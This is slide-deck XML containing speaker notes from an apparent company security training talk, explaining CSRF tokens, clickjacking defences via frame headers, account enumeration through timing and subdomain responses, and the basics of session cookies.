      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1825" name="Shape 1825"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Thankfully, all of this logic is usually built into most frameworks. In Rails all you need to do is add protect_from_forgery to your controllers. But at least now you know what it's doing behind the scenes!</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7" name="Shape 1837"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1838" name="Shape 1838"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Now if we revisit our earlier example, you can see how the attacker would no longer be able to craft a form that would work, since they would have no way of knowing the correct token without already having access to the user's session (which if they did, it would be game over anyway). So we've made it impossible for them to perform a CSRF attack against those requests.</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6" name="Shape 1846"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1847" name="Shape 1847"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>So the key takeaway here is to always use CSRF tokens whenever you're performing state changing operations. That is essentially anything that's not a "READ".</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:p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5" name="Shape 1855"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1856" name="Shape 1856"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Actually, quickly on that subject, also make sure not to use GET requests for state changing operations. I remember a fun story that made the rounds a few years ago where there was an administrative panel which allowed you to delete rows from a database. The "Delete" links were all GET requests. A user visited the admin overview page, and their browser went a pre-fetched all of the links on the page in order to speed things up. But of course, since it followed the links, it went ahead and deleted the entire database. Fun times.</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5" name="Shape 1865"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1866" name="Shape 1866"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>One final type of attack I wanted to cover, that's similar to XSS and CSRF is something called "Clickjacking".</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5" name="Shape 1875"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1876" name="Shape 1876"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>This is where you render a website in an iframe, put your own stuff on top of it, but pass through any clicks the user makes. So for example, you render eBay in the background on a product you're trying to sell, and line up the "Buy It Now" button with a fake button you've added that says something else. If you trick the user into clicking the page, and they're logged into eBay, it would purchase your item and send you some money.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Another method is moving a window or showing a popup just as you go to click, etc. So you end up clicking something else.</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0" name="Shape 1890"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1891" name="Shape 1891"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Thankfully this is pretty easy to defend against. There's a HTTP header we can include in our responses which tell a browser whether it's allowed to render our website in a frame or not. The two main options which prevent clickjacking are SAMEORIGIN, which means it can only be loaded into a frame if we're the ones doing it. Or DENY which entirely prevents the site from loading in a frame.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defRPr i="1"/>
            </a:pPr>
            <a:r>
              <a:t>This series of redacted slides went through the story of how a critical security vulnerability was responsibly disclosed to us by a security researcher. We went over how the bug was reported to us, how we confirmed its validity, showed exactly where in our code the bug was (and why it was an issue), and how it was fixed. Due to the sensitive nature of the bug, we've chosen to redact this section.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr i="1"/>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr i="1"/>
            </a:pPr>
            <a:r>
              <a:t>One thing worth sharing though is that one of the lessons in the redacted slides was related to the fact the bug was caused by a missing check in the code. This type of bug is very difficult to detect with automated tools, since the existing code itself is perfectly valid, the vulnerability comes from the absence of code.</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9" name="Shape 1899"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1900" name="Shape 1900"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>So the key here is to make sure this header is set to SAMEORIGIN or DENY on every logged in page.</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9" name="Shape 1909"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1910" name="Shape 1910"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>If you're interested in learning more about cross-site request forgery, here are some links you can check out.</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8" name="Shape 1918"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1919" name="Shape 1919"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Next topic is Account Enumeration, and this is a nice short one.</a:t>
            </a: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8" name="Shape 1928"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1929" name="Shape 1929"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>So what's this all about? Account enumeration is where you can extract a list of users or customers from a website. It's very useful for social engineering, but can also lead to security issues too if you're able to extract email addresses.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Let's take a look at some quick examples.</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2" name="Shape 1952"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1953" name="Shape 1953"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Let's say we have a login form, where I try and login as myself with a bad password. It takes 3 seconds before it comes back with an error message.</a:t>
            </a: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6" name="Shape 1976"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1977" name="Shape 1977"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>I try again with a different email address, but this time it comes back almost immediately with an error.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>What can we infer from this?</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1" name="Shape 1991"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1992" name="Shape 1992"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>We can infer that the first is a user with an account on this site, and the second isn't. What's happening in the background is that in the first instance, the user was found, and the website attempted to hash the password to validate it. That took 3 seconds before it knew the password was wrong and showed an error.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>In the second case, the website couldn't even find the user, so never attempted to hash the password, it just failed immediately.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Little things like this can give away lots of information.</a:t>
            </a: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1" name="Shape 2001"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2002" name="Shape 2002"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Let's look at another example. Let's say I visit the subdomain for a PagerDuty account I suspect exists. It loads the login page. OK great.</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1" name="Shape 2011"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2012" name="Shape 2012"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>But now if I visit one that doesn't exist, I get a different experience.</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6" name="Shape 2026"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2027" name="Shape 2027"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>From this I can infer that the first company has a PagerDuty account, but the latter doesn't. Now this obviously isn't 100% foolproof, nothing says someone has to chose a subdomain that matches their company, in fact a lot don't. But we've actually had competitors exploit this particular behavior in the past in order to identify companies that use us, and then contact those existing customers asking them to switch to their own product! (I know, cheeky right?!)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>So why is it still this way? Surely the fix is easy, just show a login page every time. That would indeed solve this issue, but it also presents other problems, as we discovered first-hand. If a customer mistypes their subdomain, then attempts to login, they get login failures. The first assumption is that their account is disabled or PagerDuty isn't working, and they reach out to our support team. Showing a clear error that the subdomain is wrong stops us getting these types of requests, and lets users know that they got the wrong subdomain.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>The point I'm trying to make here is that there's sometimes a trade off between security and having a better user experience, and sometimes the better user experience makes more sense.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Shape 346"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="347" name="Shape 347"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>The point I'm trying to make here is that we're not perfect. Every system in the world has security issues. An external researcher with no access to our source code (we hope) was able to find this bug. It's up to all of us to be on the lookout for things like this ourselves too.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>It's not all doom and gloom though, there was a happy ending here...</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5" name="Shape 2035"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2036" name="Shape 2036"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>We can infer lots of little bits of information based on how we display things back to users. It's very difficult to fully prevent these types of problems. There's usually always at least some way to figure out if an account is real. For example, another common trick is to try a password reset, and the website will tell you if they sent the email or not, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>But in general, you want to make sure failure paths still follow a similar flow. In the user login case, hash the password even if you already know the user is wrong, so it takes roughly the same amount of time.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>If you can, you also want to try and avoid any boolean tests for if an account or customer exists. As mentioned before though, these usually exist to make the user experience better, so the trade off can be worth it. For example, you can test if a Google account is genuine by trying to login. If you get to the password screen then an account exists, if it doesn't you'll get an error saying the account doesn't exist.</a:t>
            </a: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4" name="Shape 2044"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2045" name="Shape 2045"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>But as a general rule, just be mindful of the type of data you might accidentally give an attacker insight into.</a:t>
            </a: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4" name="Shape 2054"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2055" name="Shape 2055"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>If you want to know more about this and why it's an issue, here are some pages you can visit.</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3" name="Shape 2063"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2064" name="Shape 2064"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>OK, you've heard me talk about cookies a few times. So now we're going to talk about Session Management, where I'll go over just exactly what these "cookie" things are.</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3" name="Shape 2073"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2074" name="Shape 2074"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>First, what do we mean when we talk about "Session Management". Well, we're talking about being able to identify a user over multiple requests. We want to know if the person we're talking to now, is the same person we were talking to a moment ago.</a:t>
            </a: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1" name="Shape 2081"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2082" name="Shape 2082"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>This is an issue because HTTP is a stateless protocol. What does that mean exactly?</a:t>
            </a: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9" name="Shape 2119"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2120" name="Shape 2120"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>In a world without session management, each HTTP request happens in complete isolation. So let's say a user goes to login to a website. They say "Hi, I'm Bob, here's my password". The website sees their password, checks that it's them, and replies in the affirmative.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>The user might then want to take a look at their profile. But without any session management, this new request has no previous context whatsoever, so the website would have no idea who they're talking to.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:p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8" name="Shape 2128"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2129" name="Shape 2129"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>To solve this problem, we use something called cookies. No, not this type of cookie.</a:t>
            </a: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9" name="Shape 2139"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
